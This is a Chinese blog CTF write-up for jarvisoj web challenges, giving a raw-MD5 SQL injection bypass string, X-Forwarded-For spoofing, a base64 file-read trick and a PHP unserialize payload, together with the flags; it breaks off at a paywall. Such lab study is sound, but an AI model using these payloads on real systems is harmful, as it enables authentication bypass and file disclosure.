jarvisoj WEB +MISC writeup

最新推荐文章于 2022-08-27 14:06:23 发布
最新推荐文章于 2022-08-27 14:06:23 发布
阅读量7.2k 收藏
点赞数
分类专栏: WriteUp 文章标签: writeup web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ni9htMar3/article/details/53889882
版权

WEB

PORT 51

打开后发现需要利用51端口进行访问呢
这里写图片描述

直接利用curl命令访问即可
这里写图片描述

命令用法

curl –local-port 51 http://xx

flag:PCTF{M45t3r_oF_CuRl}

Login

打开后是一个输入框,随便输入,尝试抓包,得到hintHint: "select * from `admin` where password='".md5($pass,true)."'"

直接百度,得到一个博客
直接输入字符串ffifdyop得到flag

LOCALHOST

看来需要localhost access only!!直接利用Modify Headers直接加上X-Forwarded-For: 127.0.0.1即可

神盾局的秘密

打开是一张图片,直接抓包
这里写图片描述

会发现有个base64编码的地址,猜测这是利用base64访问任意文件
访问showimg.php

<?php
    $f = $_GET['img'];
    if (!empty($f)) {
        $f = base64_decode($f);
        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
            readfile($f);
        } else {
            echo "File not found!";
        }
    }
?>

访问index.php

<?php 
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>

查看shield.php

<?php
    //flag is in pctf.php
    class Shield {
   
        public $file;
        function __construct($filename = '') {
   
            $this -> file = $filename;
        }

        function readfile() {
   
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

看到源码可以知道这是一个序列化的漏洞,直接按照格式生成一个,payload

<?php
    class Shield {
   
        public $file;
        function __construct($filename = '') {
   
            $this -> file = $filename;
        }
    }
    $a = new Shield();
    $a->file = "pctf.php";
    echo serialize($a);
?>

得到

O:6:"Shield":1:{
   s:4:"file";s:8:"pctf.php";}

flag

<?php 
    //Ture Flag : PCTF{W3lcome_To_Shi3ld_secret_Ar3a}
    //Fake flag:
    echo "FLAG: PCTF{I_4m_not_fl4g}"
?>

IN a mess

查看源码得到提示index.phps,访问得

?php

error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF资料web题型及其理论+misc日志分析
03-25
CTF资料web题型及其理论+misc日志分析
CTF php代码审计 strpos()函数漏洞 XXE漏洞xinclude()
baynk的博客
03-21 3165
这个题之间弄了好一会,都没搞出来,一直没时间,今天下定决定把它做出来!!! <?php highlight_file(__FILE__); class Login { public function __construct($user, $pass) { $this->loginViaXml($user, $pass); } ...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
2020第五空间 web writeup
a3320315的博客
06-27 3344
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
[Vulhub] PHP环境 XML外部实体注入漏洞(XXE)
weixin_45605352的博客
05-07 3360
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2313
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
MEGA+616+FireFog+Magic+8bit+Misc+-+NeatWolfs+Pack01+v2.2
08-24
《Unity3D中的粒子系统深度解析——以"MEGA+616+FireFog+Magic+8bit+Misc+-+NeatWolfs+Pack01+v2.2"为例》 Unity3D作为一款强大的游戏开发引擎,其内置的粒子系统是创造各种视觉特效的关键工具。"MEGA+616+FireFog+...
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
ISCC2015 Writeup MISC - Q7.docx
09-30
ISCC2015 Writeup MISC - Q7.docx
2020年12月20日-河南省金盾杯 JDBCTF Crypto+Misc题目打包
12-21
3. "Misc":杂项通常涵盖所有其他类型的安全挑战,可能包括但不限于Web应用安全、二进制分析、取证分析、社会工程、网络嗅探等。这个类别的题目设计灵活,考验选手的综合技能和创新能力。 通过参与此类比赛,参赛者...
EOS文档
Fly_鹏程万里
12-17 362
Wiki导航 术语表 公测: Dawn 2.0 概览 节点 公测端点 链接EOSD和公测网络 链接本地EOSC和公测网络 公测账户 程序和工具 eosd eosc eos钱包 launcher 快照 eoscpp 本地环境 获取代码 编译EOS Docker 创建并启动一个测试链 常见问题 账户及权限 钱包 ...
1.7服务端漏洞——XXE漏洞原理
The code way of kinnisoy
07-07 594
XXE漏洞原理 1.XXE是什么 XXE全称是——XML External Entity,也就是XML外部实体注入攻击.漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 xml实体注入就是利用了客户端返回xml提交数据时,注入远程调用xml实体的代码来实现一些想要的功能。 要想搞懂XXE,肯定要先了解XML语法规则和外部实体的定义及调用形式。 2.XML介绍 XML数据传输类型(同类:JSON 序列化) XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 语法规则: 1.所有的X
VulnHub_XXE xxe writeup ctfgame_logs
m0_58543272的博客
08-27 957
vulnhub的一个xxe靶场的全程writeup
XXE漏洞详解
weixin_56714714的博客
07-25 7783
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
SRC挖洞之SSRF与XXE漏洞的实战案例
道阻且长,行则将至。
05-31 2202
文章目录前言SSRF漏洞案例1 某翻译网SSRF可通内网案例2 某翻译网SSRF防护绕过案例3 某站SSRF读取本地文件案例4 某站视频解析导致SSRF案例5 某狗主站SSRF多种绕过案例6 某乎网SSRF可探测内网XXE漏洞案例1 用友某软件存在XXE漏洞案例2 XFire 开发组件XXE漏洞案例3 博客搬家功能处XXE漏洞案例4 用友某软件存在XXE盲注总结 前言 前面一篇文章 SRC挖洞之文件上传/下载漏洞的实战案例 介绍了 任意文件下载漏洞 和 任意文件上传漏洞,本文收集讲述下 SSRF 漏洞和 X
XXE漏洞基础以及进阶
weixin_45682070的博客
06-26 379
XML编程基础 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计...
对xxe漏洞靶机编写poc和exp
rlenew的博客
11-25 1108
主机地址:172.16.131.85 靶机地址:192.168.6.211 (这里不再对xxe漏洞进行讲解,自行百度。主要分为两类有回显xxe和无回显xxe) 直接访问靶机地址 利用dirb扫描得到了xxe和admin.php页面,访问xxe 抓包进行测试 因为已经是xxe靶机了,所以直接开始编写poc代码。poc的主要代码段为 def poc(url): payload = '<?xml version="1.0" encoding="UTF-8"?>\n' payload
PHP-XXE-Lab——漏洞利用
W小哥
12-22 1781
一、环境搭建 环境源码下载地址:https://github.com/c0ny1/xxe-lab 下载后,php_xxe放在网站根目录即可运行 二、漏洞利用 访问目标网站,如下图所示 输入用户名、密码后,使用burpsuite拦截数据包,仔细观察传输数据的部分,跟大多数传输数据方式不一样 大多数传递方式,是下面这两种 所以,如果在渗透测试过程中,发现POST数据传递方式是 adminpassword 则说明,网站是采用的XML语言接收的数据,此处可能存在XXE漏洞 接下来,利用XXE漏洞读取敏感文件
安全测试 - 第二课之XXE 漏洞
撒忆雨
07-23 417
英文简称:XXE 英文全称:XML Extension Entity Injection 中文全称:XML 外部实体注入 XML是⼀种⾮常流⾏的标记语⾔。它⽤于配置⽂件,⽂档格式(如OOXML,ODF,PDF,RSS,…),图像格式(SVG, EXIF标题)和⽹络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,…) 常⻅的xml注⼊攻击如下所示: 攻击原理主要是: 在解析外部实体的过程中,XML解析器可以根据URL中指定的⽅案(协议)来查询各种⽹络协议和服务(D
webmisc那个就业
09-19
在当今的数字时代,WebMisc(其他)领域都是就业市场上具有潜力和广阔发展空间的行业。 首先,在Web领域,随着互联网的不断发展和普及,对于网站的需求也越来越大。从企业的官方网站到电子商务平台,从社交媒体到在线教育,无处不体现出Web技术和网站设计的重要性。因此,Web开发人员和设计师的需求日益增加。具备良好的前端和后端开发技术、熟悉各种Web框架和语言,以及对用户体验和界面设计有深入了解的人才,将具有更多的就业机会。同时,随着移动互联网的兴起,响应式网页设计和移动应用开发也成为就业的热门方向。 另一方面,在Misc领域,虽然概括性较广,但却存在许多与Web相关的就业机会。比如数据分析、人工智能和机器学习等领域,这些都需要大量的数据处理、算法优化以及模型设计能力。同时,网络安全、信息管理和数字化营销等专业领域也对有相关技术和知识的人才有较高的需求。此外,还有许多具体领域中的Misc工作,例如网络运维、数据库管理、系统架构设计等,也都需要有技术能力和专业知识的专业人才来支持和推动。 总结来说,WebMisc领域都有很好的就业前景。随着技术的发展和需求的增加,这两个领域所涉及的工作岗位将不断增加。对于有相关技术、技能和知识的人才来说,他们将有机会在这些领域找到一份稳定的工作,并在未来的职业发展中获得更多的机会和成长。因此,不管是选择Web还是Misc领域,学习和掌握相关的技术与知识,将为自己的就业前景打下坚实的基础。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值